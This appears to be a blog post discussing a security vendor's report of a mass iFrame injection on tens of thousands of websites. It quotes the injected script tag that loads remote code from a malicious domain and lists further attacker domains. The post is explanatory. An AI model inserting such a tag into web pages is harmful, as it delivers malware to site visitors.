ScanSafe is an acclaimed provider of Software as a Service (SaaS) Web security. I try to pay attention to their STAT Blog, it usually contains worthwhile information. Today was no exception, as foretold by the blog post’s title: Up to 55K Compromised by Potent Backdoor/Data Theft Cocktail.

Infamous iFrame

ScanSafe’s Mary Landesman author of the ominous-sounding post somehow found a malicious iFrame embedded in upwards of 55, 000 Web sites. That didn’t mean much to me until I found out what an iFrame was. According to the Web Design Group an iFrame consists of:

“The IFRAME element defines an inline frame for the inclusion of external objects including other HTML documents. IFRAME provides similar functionality to OBJECT. One advantage of IFRAME is that it can act as a target for other links.”

The last sentence is the one to pay attention to. In this particular case, the iFrame includes of the following snippet of code:

“script src=http://a0v.org/x.js”

If I understand correctly, that simple phrase will redirect Web browsers to http://a0v.org/a.js without the user knowing it.

What happens then

The Web site a0v.org is where the heavy-duty malware is. Once the Web browser is talking to a0v.org, Landesman explains a slew of malicious code consisting of trojans, backdoors, password stealers, and possibly a downloader will try to install on the visiting computer. If the operating system is Windows-based and vulnerable, the malware will successfully install.

Yes, this is yet again a Windows-only issue. Fortunately, all of our computers are up-to-date and have sufficient protection to prevent any malware from taking root. Right?

Check it out

What I find fascinating is that we can repeat Landesman’s experiment, easily finding how many Web pages are currently infected. Enter “script src=http://a0v.org/x.js” in your favorite search engine and check the number of hits.

When Landesman first wrote the post, Google search found 54,900 hits. I’m getting 97,200 hits a day later. Some of the sites include feedzilla.com, latindiscover.com, and foodsresourcebank.org. Maybe it’s on purpose, but no one is explaining why the number of infected Web pages is growing so fast.

A0v.org is not the only malicious Web destination. Others include: ahthja.info, gaehh.info, htsrh.info, car741.info, game163.info, car963.info, and game158.info. Landesman mentions that ahthja.info is the most prolific of the group. You may find the WHOIS record for ahthja.info interesting:

Notice the unusual registrant and street names. Seems like there is very little vetting going on at this particular registrar.

Catch 22

I am by no means a Web developer. Still, it seems we are going to have this problem until client-side scripting can be ran securely. Sure, disabling JavaScript or using an application like NoScript solves the problem. That is until you want to see what doing so has broken on the Web site.

Final thoughts

I have a pretty good idea why so many computers are vulnerable. But, what’s going on with Web servers? Are the current Web server exploits so new, only the bad guys know about them? It sure seems like it.